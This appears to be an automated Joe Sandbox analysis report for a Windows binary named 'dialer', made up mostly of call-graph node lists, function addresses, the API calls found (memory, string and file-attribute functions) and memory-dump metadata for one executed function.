2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003250 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 78 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2275 14000194d 2274->2275 2279 140001a20 2274->2279 2276 140001ba0 4 API calls 2275->2276 2278 14000199e 2275->2278 2276->2275 2277 1400019e9 VirtualProtect 2277->2278 2278->2273 2278->2277 2279->2278 2280 140001b36 2279->2280 2282 140001b53 2279->2282 2281 140001ba0 4 API calls 2280->2281 2281->2282 2286 140003266 2283->2286 2284 14000336d wcslen 2395 14000153f 2284->2395 2286->2284 2288 14000356e 2288->2265 2291 140003468 2294 14000348e memset 2291->2294 2296 1400034c0 2294->2296 2297 140003510 wcslen 2296->2297 2298 140003526 2297->2298 2302 14000356c 2297->2302 2299 140003540 _wcsnicmp 2298->2299 2300 140003556 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003631 wcscpy wcscat memset 2304 140003670 2301->2304 2302->2301 2303 1400036b3 wcscpy wcscat memset 2306 1400036f6 2303->2306 2304->2303 2305 1400037fe wcscpy wcscat memset 2307 140003840 2305->2307 2306->2305 2308 140003b91 wcslen 2307->2308 2309 140003b9f 2308->2309 2313 140003bdb 2308->2313 2310 140003bb0 _wcsnicmp 2309->2310 2311 140003bc6 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003c92 wcscpy wcscat memset 2315 140003cd4 2312->2315 2313->2312 2314 140003d17 wcscpy wcscat memset 2316 140003d5d 2314->2316 2315->2314 2317 140003d8d wcscpy wcscat 2316->2317 2318 140006163 memcpy 2317->2318 2320 140003dbf 2317->2320 2318->2320 2319 140003f12 wcslen 2321 140003f57 2319->2321 2320->2319 2322 140003fbc wcslen memset 2321->2322 2535 14000157b 2322->2535 2324 14000463f memset 2326 14000466e 2324->2326 2325 1400046b3 wcscpy wcscat wcslen 2576 14000146d 2325->2576 2326->2325 2330 140004629 2333 14000145e 2 API calls 2330->2333 2331 140004853 2339 140004892 memset 2331->2339 2332 14000157b 2 API calls 2364 1400040e5 2332->2364 2335 140004624 2333->2335 2335->2324 2337 1400047c3 2662 1400014a9 2337->2662 2338 14000486f 2341 14000145e 2 API calls 2338->2341 2343 140006244 2339->2343 2344 1400048b6 wcscpy wcscat wcslen 2339->2344 2341->2331 2363 1400049e0 2344->2363 2347 14000485f 2349 14000145e 2 API calls 2347->2349 2348 14000145e 2 API calls 2348->2364 2349->2331 2351 140004454 _wcsnicmp 2354 14000460c 2351->2354 2351->2364 2355 14000145e 2 API calls 2354->2355 2359 140004618 2355->2359 2356 140004847 2360 14000145e 2 API calls 2356->2360 2357 1400044b2 _wcsnicmp 2357->2354 2357->2364 2358 140004ad9 wcslen 2361 14000153f 2 API calls 2358->2361 2362 14000145e 2 API calls 2359->2362 2360->2331 2361->2363 2362->2335 2363->2358 2366 140005def memcpy 2363->2366 2367 140005f2c memcpy 2363->2367 2369 140004c4d wcslen 2363->2369 2370 14000510d wcslen 2363->2370 2371 140004ea1 wcslen 2363->2371 2375 140005f64 memcpy 2363->2375 2376 140005a81 wcscpy wcscat wcslen 2363->2376 2377 14000145e NtQueryAttributesFile malloc 2363->2377 2378 140004f24 memset 2363->2378 2380 140004f8e wcslen 2363->2380 2384 140004ff6 _wcsnicmp 2363->2384 2385 140005bcc 2363->2385 2386 140005c77 wcslen 2363->2386 2388 140005824 memset 2363->2388 2389 140005a20 memset 2363->2389 2390 1400027d0 11 API calls 2363->2390 2391 14000588b memset 2363->2391 2392 140006056 memcpy 2363->2392 2393 1400058e5 wcscpy wcscat wcslen 2363->2393 2778 1400014d6 2363->2778 2823 140001521 2363->2823 2921 140001431 2363->2921 2364->2324 2364->2330 2364->2332 2364->2348 2364->2351 2364->2357 2365 140004506 _wcsnicmp 2364->2365 2368 1400042d7 wcsstr 2364->2368 2552 140001599 2364->2552 2565 1400015a8 2364->2565 2365->2354 2365->2364 2366->2363 2367->2363 2368->2354 2368->2364 2372 14000153f 2 API calls 2369->2372 2373 14000153f 2 API calls 2370->2373 2374 14000157b 2 API calls 2371->2374 2372->2363 2373->2363 2374->2363 2375->2363 2379 140001422 2 API calls 2376->2379 2377->2363 2378->2363 2379->2363 2381 1400015a8 2 API calls 2380->2381 2381->2363 2384->2363 2385->2265 2387 1400015a8 2 API calls 2386->2387 2387->2363 2388->2363 2388->2389 2389->2363 2390->2363 2391->2363 2392->2363 2852 140001422 2393->2852 2396 140001394 2 API calls 2395->2396 2397 14000154e 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000155d 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000156c 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000157b 2402->2403 2404 140001394 2 API calls 2403->2404 2405 14000158a 2404->2405 2406 140001394 2 API calls 2405->2406 2407 140001599 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015a8 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015b7 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015c6 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015d5 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015e4 2416->2417 2418 140001394 2 API calls 2417->2418 2419 1400015f3 2418->2419 2419->2288 2420 140001503 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000150d 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001512 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001521 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001530 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000153f 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000154e 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000155d 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000156c 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000157b 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000158a 2439->2440 2441 140001394 2 API calls 2440->2441 2442 140001599 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015a8 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015b7 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015c6 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015d5 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015e4 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015f3 2453->2454 2454->2291 2455 14000156c 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000157b 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000158a 2458->2459 2460 140001394 2 API calls 2459->2460 2461 140001599 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015a8 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015b7 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015c6 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015d5 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015e4 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015f3 2472->2473 2473->2291 2474 14000145e 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000146d 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000147c 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000148b 2479->2480 2481 140001394 2 API calls 2480->2481 2482 14000149a 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014a9 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014d6 2489->2490 2491 1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2291 2536 140001394 2 API calls 2535->2536 2537 14000158a 2536->2537 2538 140001394 2 API calls 2537->2538 2539 140001599 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015a8 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015b7 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015c6 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015d5 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015e4 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400015f3 2550->2551 2551->2364 2553 140001394 2 API calls 2552->2553 2554 1400015a8 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015b7 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015c6 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015d5 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015e4 2561->2562 2563 140001394 2 API calls 2562->2563 2564 1400015f3 2563->2564 2564->2364 2566 140001394 2 API calls 2565->2566 2567 1400015b7 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015c6 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015d5 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015e4 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015f3 2574->2575 2575->2364 2577 140001394 2 API calls 2576->2577 2578 14000147c 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000148b 2579->2580 2581 140001394 2 API calls 2580->2581 2582 14000149a 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014a9 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014b8 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014c7 2587->2588 2589 140001394 2 API calls 2588->2589 2590 1400014d6 2589->2590 2591 1400014e5 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014ef 2593->2594 2595 1400014f4 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 1400014fe 2597->2598 2599 140001503 2598->2599 2600 140001394 2 API calls 2598->2600 2601 140001394 2 API calls 2599->2601 2600->2599 2602 14000150d 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001512 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001521 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001530 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000153f 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000154e 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000155d 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000156c 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000157b 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000158a 2619->2620 2621 140001394 2 API calls 2620->2621 2622 140001599 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015a8 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015b7 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015c6 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015d5 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015e4 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015f3 2633->2634 2634->2331 2635 140001530 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000153f 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000154e 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000155d 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000156c 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000157b 2644->2645 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2337 2661->2338 2663 140001394 2 API calls 2662->2663 2664 1400014b8 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014c7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400014d6 2667->2668 2669 1400014e5 2668->2669 2670 140001394 2 API calls 2668->2670 2671 140001394 2 API calls 2669->2671 2670->2669 2672 1400014ef 2671->2672 2673 1400014f4 2672->2673 2674 140001394 2 API calls 2672->2674 2675 140001394 2 API calls 2673->2675 2674->2673 2676 1400014fe 2675->2676 2677 140001503 2676->2677 2678 140001394 2 API calls 2676->2678 2679 140001394 2 API calls 2677->2679 2678->2677 2680 14000150d 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001512 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001521 2683->2684 2685 140001394 2 API calls 2684->2685 2686 140001530 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000153f 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000154e 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000155d 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000156c 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000157b 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000158a 2697->2698 2699 140001394 2 API calls 2698->2699 2700 140001599 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015a8 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015b7 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015c6 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015d5 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015e4 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400015f3 2711->2712 2712->2347 2713 140001440 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000144f 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000145e 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000146d 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000147c 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000148b 2722->2723 2724 140001394 2 API calls 2723->2724 2725 14000149a 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014a9 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014b8 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014c7 2730->2731 2732 140001394 2 API calls 2731->2732 2733 1400014d6 2732->2733 2734 1400014e5 2733->2734 2735 140001394 2 API calls 2733->2735 2736 140001394 2 API calls 2734->2736 2735->2734 2737 1400014ef 2736->2737 2738 1400014f4 2737->2738 2739 140001394 2 API calls 2737->2739 2740 140001394 2 API calls 2738->2740 2739->2738 2741 1400014fe 2740->2741 2742 140001503 2741->2742 2743 140001394 2 API calls 2741->2743 2744 140001394 2 API calls 2742->2744 2743->2742 2745 14000150d 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001512 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001521 2748->2749 2750 140001394 2 API calls 2749->2750 2751 140001530 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000153f 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000154e 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000155d 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000156c 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000157b 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000158a 2762->2763 2764 140001394 2 API calls 2763->2764 2765 140001599 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015a8 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015b7 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015c6 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015d5 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015e4 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400015f3 2776->2777 2777->2347 2777->2356 2779 1400014e5 2778->2779 2780 140001394 2 API calls 2778->2780 2781 140001394 2 API calls 2779->2781 2780->2779 2782 1400014ef 2781->2782 2783 1400014f4 2782->2783 2784 140001394 2 API calls 2782->2784 2785 140001394 2 API calls 2783->2785 2784->2783 2786 1400014fe 2785->2786 2787 140001503 2786->2787 2788 140001394 2 API calls 2786->2788 2789 140001394 2 API calls 2787->2789 2788->2787 2790 14000150d 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001512 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001521 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001530 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000153f 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000154e 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000155d 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000156c 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000157b 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000158a 2807->2808 2809 140001394 2 API calls 2808->2809 2810 140001599 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015a8 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015b7 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015c6 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015d5 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015e4 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015f3 2821->2822 2822->2363 2824 140001394 2 API calls 2823->2824 2825 140001530 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000153f 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000154e 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000155d 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000156c 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000157b 2834->2835 2836 140001394 2 API calls 2835->2836 2837 14000158a 2836->2837 2838 140001394 2 API calls 2837->2838 2839 140001599 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015a8 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015b7 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015c6 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015d5 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015e4 2848->2849 2850 140001394 2 API calls 2849->2850 2851 1400015f3 2850->2851 2851->2363 2853 140001394 2 API calls 2852->2853 2854 140001431 2853->2854 2855 140001394 2 API calls 2854->2855 2856 140001440 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000144f 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000145e 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000146d 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2363 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000144f 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 2986 140001394 2 API calls 2985->2986 2987 1400015f3 2986->2987 2987->2363

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_00000001400026E1 1 Function_0000000140001AE4 34 Function_0000000140001D40 1->34 77 Function_0000000140001BA0 1->77 2 Function_00000001400014E5 73 Function_0000000140001394 2->73 3 Function_0000000140002FF0 59 Function_0000000140001370 3->59 4 Function_00000001400010F0 5 Function_00000001400031F1 6 Function_00000001400062F1 7 Function_00000001400014F4 7->73 8 Function_0000000140006600 9 Function_0000000140002500 10 Function_0000000140001800 68 Function_0000000140002290 10->68 11 Function_0000000140001000 12 Function_0000000140001E00 11->12 42 Function_0000000140001750 11->42 85 Function_0000000140001FB0 11->85 93 Function_0000000140001FC0 11->93 13 Function_0000000140006401 14 Function_0000000140001503 14->73 15 Function_0000000140001404 15->73 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140003210 19 Function_0000000140006311 20 Function_0000000140006511 21 Function_0000000140001512 21->73 22 Function_0000000140002320 23 Function_0000000140002420 24 Function_0000000140006620 25 Function_0000000140001521 25->73 26 Function_0000000140001422 26->73 27 Function_0000000140001530 27->73 28 Function_0000000140003230 29 Function_0000000140006630 29->24 30 Function_0000000140001431 30->73 31 Function_0000000140006431 32 Function_000000014000153F 32->73 33 Function_0000000140001440 33->73 34->68 35 Function_0000000140001140 48 Function_0000000140001160 35->48 36 Function_0000000140003141 37 Function_0000000140006341 38 Function_0000000140006541 39 Function_0000000140001F47 58 Function_0000000140001870 39->58 40 Function_0000000140002050 41 Function_0000000140003250 41->3 41->14 41->24 41->25 41->26 41->27 41->30 41->32 41->33 46 Function_000000014000145E 41->46 47 Function_0000000140002660 41->47 55 Function_000000014000156C 41->55 56 Function_000000014000146D 41->56 41->59 62 Function_000000014000157B 41->62 75 Function_0000000140001599 41->75 82 Function_00000001400015A8 41->82 83 Function_00000001400014A9 41->83 92 Function_00000001400016C0 41->92 97 Function_00000001400027D0 41->97 104 Function_00000001400014D6 41->104 43 Function_0000000140001650 44 Function_0000000140002751 45 Function_000000014000155D 45->73 46->73 48->41 48->48 48->58 63 Function_0000000140001880 48->63 67 Function_0000000140001F90 48->67 48->92 49 Function_0000000140001760 106 Function_00000001400020E0 49->106 50 Function_0000000140002460 51 Function_0000000140003160 52 Function_0000000140006361 53 Function_0000000140006461 54 Function_0000000140001E65 54->58 55->73 56->73 57 Function_000000014000216F 60 Function_0000000140001A70 60->34 60->77 61 Function_0000000140002770 62->73 63->23 63->34 63->47 63->77 64 Function_0000000140003180 65 Function_0000000140006281 66 Function_0000000140006381 69 Function_0000000140002590 70 Function_0000000140002790 71 Function_0000000140002691 72 Function_0000000140006591 73->29 105 Function_00000001400068E0 73->105 74 Function_0000000140002194 74->58 75->73 76 Function_000000014000219E 77->34 84 Function_00000001400023B0 77->84 96 Function_00000001400024D0 77->96 78 Function_0000000140001FA0 79 Function_00000001400027A0 80 Function_00000001400031A1 81 Function_00000001400064A1 82->73 83->73 86 Function_00000001400022B0 87 Function_00000001400026B0 88 Function_00000001400027B1 89 Function_00000001400062B1 90 Function_00000001400063B1 91 Function_0000000140001AB3 91->34 91->77 94 Function_0000000140001AC3 94->34 94->77 95 Function_00000001400014C7 95->73 97->2 97->7 97->14 97->21 97->24 97->45 97->46 97->47 97->59 97->83 97->95 98 Function_00000001400017D0 99 Function_0000000140001FD0 100 Function_00000001400026D0 101 Function_00000001400062D1 102 Function_00000001400063D1 103 Function_0000000140001AD4 103->34 103->77 104->73 105->24 107 Function_00000001400017E0 107->106 108 Function_00000001400022E0 109 Function_00000001400063E0

                                                                      Executed Functions

                                                                      Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24filenativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • NtQueryAttributesFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFileQuery
                                                                      • String ID:
                                                                      • API String ID: 2106648053-0
                                                                      • Opcode ID: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                                      • Instruction ID: 6e9c43e43475a5412bc82c74bb0b22b7dbbc15337bd8e373d78586065a7e04e3
